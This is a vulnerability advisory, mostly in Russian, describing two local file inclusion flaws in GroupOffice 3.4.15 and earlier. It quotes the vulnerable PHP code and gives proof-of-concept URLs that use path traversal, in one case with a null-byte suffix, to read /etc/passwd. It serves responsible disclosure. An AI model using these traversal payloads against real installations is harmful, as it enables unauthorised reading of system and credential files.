|
|
Цель: GroupOffice <= 3.4.15
Тип: PHP инъекция
Угроза: Средняя
Дата обнаружения: 27.05.2010
Дата оповещения разработчика: 27.05.2010
Дата выхода исправления: 31.05.2010
Автор: Arthur Gerkis
OnSec Russian Security Group (onsec [dot] ru)
Описание: 1. Уязвима переменная $_REQUEST['file'] (LFI).
Vulnerable code:
Script compress.php has following code:
$file = $GO_CONFIG->file_storage_path.'cache/'.$_REQUEST['file']; ... readfile($file); It simply reads file without any checks of permissions.
Implementation:
http://localhost/group-office/compress.php?file=../../../../../../../../etc/passwd
2. Уязвима переменная $_REQUEST['type'] (LFI).
Vulnerable code:
$type = $_REQUEST['type']; $filename = $type.'.class.inc.php'; $file = $GO_CONFIG->class_path.'export/'.$filename; if(!file_exists($file)){ $file = $GO_CONFIG->file_storage_path.'customexports/'.$filename; } if(!file_exists($file)){ die('Custom export class not found.'); } require_once($file);
Implementation:
http://localhost/group-office/export_query.php?type=../../../../../../../../../../../etc/passwd%00